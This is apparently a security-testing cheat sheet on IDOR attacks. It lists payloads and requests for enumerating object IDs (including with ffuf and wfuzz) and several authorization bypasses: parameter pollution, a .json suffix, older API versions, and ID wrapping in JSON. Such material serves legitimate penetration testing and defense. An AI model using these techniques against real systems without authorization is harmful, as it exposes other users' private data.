# IDOR (Insecure Direct Object References) Attack

IDOR is a type of access control vulnerability in web applications.

### Find Vulnerabilities from HTML Source Code <a href="#find-vulnerabilities-from-html-source-code" id="find-vulnerabilities-from-html-source-code"></a>

First check values of attributes on input elements.

```shellscript
<input name="user_id" value="8" >
```

Then try what will happen when you change the Cookie value in a HTTP header.

```shellscript
Cookie: user_id=12
```

### Change GET Parameters <a href="#change-get-parameters" id="change-get-parameters"></a>

#### Manual <a href="#manual" id="manual"></a>

```shellscript
/user?id=1
/user?id=2
/user?id=-1
/user?id=00

/admin/posts/1
/admin/posts/-1
/admin/posts/00

/static/1.txt
/static/2.txt
/static/-1.txt
/static/00.txt
```

#### Automation <a href="#automation" id="automation"></a>

```shellscript
seq 0 100 | ffuf -u https://example.com/user?id=FUZZ -w -

wfuzz -z file,./numbers.txt https://example.com/user?id=FUZZ
```

### Change POST Parameters <a href="#change-post-parameters" id="change-post-parameters"></a>

```shellscript
address=1&user_id=1
address=1&user_id=2

# URL Encode '&'
address=1%26user_id=2
```

### Basics

```shellscript
Check for valuable words:
{regex + perm} id
{regex + perm} user
{regex + perm} account
{regex + perm} number
{regex + perm} order
{regex + perm} no
{regex + perm} doc
{regex + perm} key
{regex + perm} email
{regex + perm} group
{regex + perm} profile
{regex + perm} edit
```

### Bypasses

* Add parameters onto the endpoints for example, if there was

```shellscript
GET /api_v1/messages --> 401
vs 
GET /api_v1/messages?user_id=victim_uuid --> 200
```

* HTTP Parameter pollution

```shellscript
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK

GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
```

* Add .json to the endpoint, if it is built in Ruby!

```shellscript
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
```

* Test on outdated API Versions

```shellscript
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
```

Wrap the ID with an array.

```shellscript
{“id”:111} --> 401 Unauthriozied
{“id”:[111]} --> 200 OK
```

Wrap the ID with a JSON object:

```shellscript
{“id”:111} --> 401 Unauthriozied

{“id”:{“id”:111}} --> 200 OK
```

JSON Parameter Pollution:

```shellscript
POST /api/get_profile
Content-Type: application/json
{“user_id”:<legit_id>,”user_id”:<victim’s_id>}
```